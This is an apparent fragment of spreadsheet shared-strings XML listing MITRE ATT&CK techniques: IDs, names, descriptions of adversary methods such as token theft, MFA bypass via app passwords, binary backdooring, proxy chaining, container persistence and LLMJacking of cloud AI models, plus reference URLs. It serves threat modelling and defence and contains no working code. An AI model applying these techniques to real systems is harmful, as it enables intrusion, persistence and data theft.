    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024)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
https://attack.mitre.org/techniques/T1102</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>T1547.015</t>
  </si>
  <si>
    <t>Login Items</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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/015</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)
Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
https://attack.mitre.org/techniques/T1608/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1104</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</si>
  <si>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</si>
  <si>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</si>
  <si>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to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)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
https://attack.mitre.org/techniques/T1657</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
https://attack.mitre.org/techniques/T1480</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1606/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
https://attack.mitre.org/techniques/T1654</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function)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
https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>T1021.007</t>
  </si>
  <si>
    <t>Cloud Services</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1021/007</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>T1027.012</t>
  </si>
  <si>
    <t>LNK Icon Smuggling</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/012</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>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Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
Token theft can also occur through social engineering, in which case user action may be required to grant access.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https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>T1598.002</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</si>
  <si>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https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</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</si>
  <si>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 Entra ID.(Citation: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Alternatively, they may use the &lt;code&gt;CreateLoginProfile&lt;/code&gt; API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)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Entra ID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to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence)
In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords)
https://attack.mitre.org/techniques/T1098/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)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
https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Make and Impersonate Token</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</si>
  <si>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function.(Citation: LogonUserW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
https://attack.mitre.org/techniques/T1134/003</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1048/002</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1057</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>T1556.008</t>
  </si>
  <si>
    <t>Network Provider DLL</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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/008</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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 using `mofcomp.exe`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
https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t>T1496.004</t>
  </si>
  <si>
    <t>Cloud Service Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. 
For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)
In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability.
https://attack.mitre.org/techniques/T1496/004</t>
  </si>
  <si>
    <t>T1585.003</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>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Entra ID.(Citation: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https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1134/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</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</si>
  <si>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https://attack.mitre.org/techniques/T1606</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</si>
  <si>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</si>
  <si>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</si>
  <si>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If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)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
https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Host Software Binary</t>
  </si>
  <si>
    <t>Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)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After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>T1552.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1552/008</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>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SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019),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https://attack.mitre.org/techniques/T1071/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1102/003</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
For example,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login interfaces.
Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)
https://attack.mitre.org/techniques/T1534</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1199</t>
  </si>
  <si>
    <t>T1136.003</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</si>
  <si>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In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)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
https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1069/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021)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
https://attack.mitre.org/techniques/T1098</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>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Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.
https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>T1574.013</t>
  </si>
  <si>
    <t>KernelCallbackTable</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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/013</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.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t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Phishing</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</si>
  <si>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or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)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
https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>T1496.001</t>
  </si>
  <si>
    <t>Compute Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
One common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)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[Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)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https://attack.mitre.org/techniques/T1496/001</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Adversaries may chain together multiple proxies to disguise the source of malicious traffic.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For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant) 
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018)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
https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/004</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Disable or Modify Tools</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</si>
  <si>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https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022)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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020)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https://attack.mitre.org/techniques/T1001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>T1584.006</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</si>
  <si>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
https://attack.mitre.org/techniques/T1584/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1601</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>T1059.011</t>
  </si>
  <si>
    <t>Lua</t>
  </si>
  <si>
    <t>Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (&lt;code&gt;.lua&lt;/code&gt;), or from Lua-embedded programs (through the &lt;code&gt;struct lua_State&lt;/code&gt;).(Citation: Lua main page)(Citation: Lua state)
Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
https://attack.mitre.org/techniques/T1059/011</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>T1543.005</t>
  </si>
  <si>
    <t>Container Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.
For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)
In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)
Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)
https://attack.mitre.org/techniques/T1543/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>T1585.001</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</si>
  <si>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
https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1068</t>
  </si>
  <si>
    <t>T1564.009</t>
  </si>
  <si>
    <t>Resource Forking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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>T1556.006</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1556/006</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>T1505.004</t>
  </si>
  <si>
    <t>IIS Components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</si>
  <si>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
https://attack.mitre.org/techniques/T1505/004</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>T1027.014</t>
  </si>
  <si>
    <t>Polymorphic Code</t>
  </si>
  <si>
    <t>Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone) 
Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)
https://attack.mitre.org/techniques/T1027/014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</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</si>
  <si>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
https://attack.mitre.org/techniques/T1599</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>Adversaries may employ an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
https://attack.mitre.org/techniques/T1573</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>T1567.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1567/003</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1592/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>T1566.004</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</si>
  <si>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
https://attack.mitre.org/techniques/T1566/004</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>T1213.004</t>
  </si>
  <si>
    <t>Customer Relationship Management Software</t>
  </si>
  <si>
